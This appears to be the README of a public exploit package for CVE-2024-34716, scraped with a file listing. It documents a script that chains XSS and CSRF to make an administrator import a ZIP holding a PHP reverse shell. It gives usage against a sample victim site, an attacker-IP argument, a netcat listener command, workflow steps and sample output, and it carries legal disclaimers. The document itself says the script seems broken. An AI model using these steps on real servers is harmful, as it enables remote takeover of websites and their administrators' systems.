来源

关联漏洞

介绍

> Seems broken for now will update later

# Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

## Requirements

- **Netcat**: Ensure Netcat is installed and can listen on a specified port (default: 9001).
- **Python 3**: Used to serve files over HTTP.
- **Curl & JQ**: Used to fetch and handle HTTP requests and JSON parsing.

## Usage

```bash
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
```

### Arguments

- `target_url`: Base URL of the target (e.g., `https://example.com`).
- `admin_endpoint`: Path to the admin theme import endpoint.
- `admin_email`: Email address of an administrator (to spoof for the payload).
- `attacker_ip`: IP address where the reverse shell listener will receive the connection.

### Example

```bash
./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
```

### Exploit Workflow

1. **Reverse Shell Creation**: Generates a PHP reverse shell using [revshells.com](https://www.revshells.com) with the provided `attacker_ip` and port `9001`.
2. **ZIP Packaging**: The reverse shell script (`love.php`) is compressed into `Love-exploit.zip`.
3. **CSRF Token Fetch**: Retrieves the CSRF token from the target to authorize the theme import request.
4. **HTML Payload Construction**: Builds an HTML payload (`csrf_payload.html`) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.
5. **HTTP Server Setup**: A temporary HTTP server on port `8000` serves `Love-exploit.zip` for the target to import.
6. **XSS Upload and CSRF Trigger**: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. **Reverse Shell Listener**: The attacker monitors incoming connections from the victim using Netcat.

## Execution Steps

1. Start a Netcat listener on your machine:
   ```bash
   nc -nvlp 9001
   ```

2. Run the script:
   ```bash
   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
   ```

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

## Output

The script outputs the following information during execution:

- CSRF token retrieval status.
- Status of reverse shell creation and packaging.
- Status of payload delivery and HTTP server status.

## Important Notes

- **Permissions**: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
- **Testing Environment**: Use in a controlled, authorized environment only, such as a cybersecurity lab.
- **Port Conflicts**: Ensure ports `8000` (HTTP server) and `9001` (Netcat listener) are free before running the script.

---

### Example Output

```plaintext
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
```

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

--- 

### Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.

文件快照

 [4.0K]  /data/pocs/a8b176686e4c62482da3bf0314e9e99134f1b60d
├── [5.3K]  CVE-2024-34716
└── [3.9K]  README.md

0 directories, 2 files

备注